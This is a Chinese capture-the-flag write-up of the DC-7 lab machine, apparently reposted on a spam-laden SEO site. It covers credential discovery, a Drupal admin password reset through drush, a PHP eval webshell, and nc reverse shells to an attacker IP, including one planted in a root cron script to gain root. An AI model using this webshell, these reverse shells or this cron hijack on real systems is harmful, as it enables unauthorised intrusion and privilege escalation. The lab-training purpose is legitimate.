当前位置: 首页 > news >正文

中山网站建设模板招商品牌策划方案怎么做

中山网站建设模板招商,品牌策划方案怎么做,oa办公系统官网页版,商业网站开发设计实训总结DC_7 信息搜集 存活检测 详细扫描 后台网页扫描 网页信息搜集 搜索相关信息 在配置中发现了用户名密码字样 $username "dc7user"; $password "MdR3xOgB7#dW";ssh 登录 尝试使用获取的账密进行登录 网页登录失败 尝试 ssh 登录 成功登录 登陆今后提…

DC_7

信息搜集

存活检测

image-20231024085438718

详细扫描

image-20231024085540887

后台网页扫描

image-20231024124401722

网页信息搜集

image-20231024085507080

搜索相关信息

image-20231024085734738

image-20231024085911869

image-20231024085940503

在配置中发现了用户名密码字样

$username = "dc7user";
$password = "MdR3xOgB7#dW";

image-20231024090054193

ssh 登录

  • 尝试使用获取的账密进行登录

    网页登录失败

    image-20231024124513243

  • 尝试 ssh 登录

    成功登录

    image-20231024130241838

  • 登陆今后提示收到了一个邮件

    查看邮件内容

    cd /var/mail
    

    image-20231024130516576

  • 看到有 root 的计划任务

  • 查看执行计划任务的文件权限

    image-20231024125954322

    www-data 组拥有全部权限,而其他用户无修改权限

  • 查看 dc7user 属组,不属于 www-data,无法修改内容

    image-20231024130048738

  • 查看计划任务内容

    image-20231024125726351

    脚本内容显示

    进入 /var/www/html 目录可执行 drush 命令

    Drush 是一个用于管理 Drupal 网站的命令行工具。它提供了一组功能丰富的命令,可以在不使用网页界面的情况下执行各种 Drupal 管理任务。

    Drush 命令可以在终端或命令提示符中使用,并且可以在 Drupal 项目的根目录中执行

  • 可以使用 drush 命令更改用户的登陆密码

    cd /var/www/html/
    drush user-password admin --password="123456"
    

    image-20231024131937921

反弹 shell

  • 登录网页

    输入用户名和修改的密码,登录

    image-20231024132105472

  • 登录后发现可以编辑内容

    image-20231024132636513

  • 尝试上传一句话 php 木马

    <?php @eval($_POST['gjl']); ?>
    

    发现编辑时没有 php 解析

    image-20231024133038787

  • 拓展中可安装 php

    PHP 解释器 Drupal 官方连接

    https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz
    

    image-20231024133120870

    成功安装

    image-20231024133132911

  • 勾选 php,点击最下方的 install

    image-20231024133305703

  • 成功启动 php

    image-20231024133417813

  • 上传一句话木马

    image-20231024133216117

    选择 php code,点击 save

    image-20231024133601036

    image-20231024133736552

  • 打开蚁剑

    添加上传 php 所在的 url,测试链接

    image-20231024133830997

  • 打开连接,开启虚拟终端

    image-20231024133947875

  • kali 开启监听

    image-20231024133938625

  • 在蚁剑的虚拟终端输入反弹命令

    nc -e /bin/bash 10.4.7.146 7777
    

    image-20231024134119374

    成功反弹进 kali

提权

  • 此时获得了 www-data 的 shell

    image-20231024134308655

  • 根据前面搜集的信息可知,现在可以修改 root 的定时任务 /opt/scripts/backups.sh

  • kali 开启监听

    image-20231024134616970

  • 添加提权命令

    echo "nc -e /bin/bash 10.4.7.146 6666" > /opt/scripts/backups.sh
    

    image-20231024134741234

    因为 backup.sh 是以 root 权限运行,连接反弹 shell 后获取的权限为 root 权限

  • 等待计划任务自动执行(运气不好最长等 15 分钟,计划任务 15 分钟执行一次)

    image-20231024135030629

  • 提权成功

    image-20231024140232844

总结

  • drush 修改 Drupal 网站账户密码

  • 计划任务、反弹 shell 提权

http://www.jinmujx.cn/news/76927.html

相关文章:

  • 音乐网站建设课的期末报告书微信投放广告多少钱
  • 长春模板建站公司whois查询 站长工具
  • 帮别人做网站市场价国内最新消息新闻
  • 临沂网站建设铭镇seo指的是搜索引擎营销
  • 东莞专业做淘宝网站外贸网站外链平台
  • 会议网站建设的意义百度app在哪里找
  • 外贸网站制作哪家好青岛网络优化厂家
  • 怎么登录企业网站百度刷seo关键词排名
  • 学生做的网站百度还原
  • wordpress文章美观杭州百度seo优化
  • 前端网站怎么做广点通广告平台
  • 鹤山今日最新新闻南京百度推广优化
  • 网站seo推广方案seo关键词排名怎么提升
  • 网站推广有哪些手段网络营销八大目标是什么
  • wordpress 回收站在哪里南宁关键词优化软件
  • 织梦如何做电商网站dsp投放方式
  • 锡林郭勒盟建设厅官方网站全国十大婚恋网站排名
  • seo网站建设流程惠州seo排名优化
  • 怎么做网站备份百度seo入驻
  • googl浏览器做桌面版网站抖音十大搜索关键词
  • 免费的建网站软件广州网络推广外包
  • 提供图片做网站的要求今日新闻摘抄
  • 台州专业制作网站seo网站培训优化怎么做
  • 安阳工学院图书馆找做网站的书在哪宁波优化seo软件公司
  • 物流网站建设方案权限管理深圳网站设计制作
  • 深圳做网站设计场景营销
  • 废旧回收做哪个网站好网站域名备案信息查询
  • 太原做网站的通讯公司有哪些网络推广企划
  • wordpress 主题导出网站专业术语中seo意思是
  • 鞍山公司做网站软文营销的作用有哪些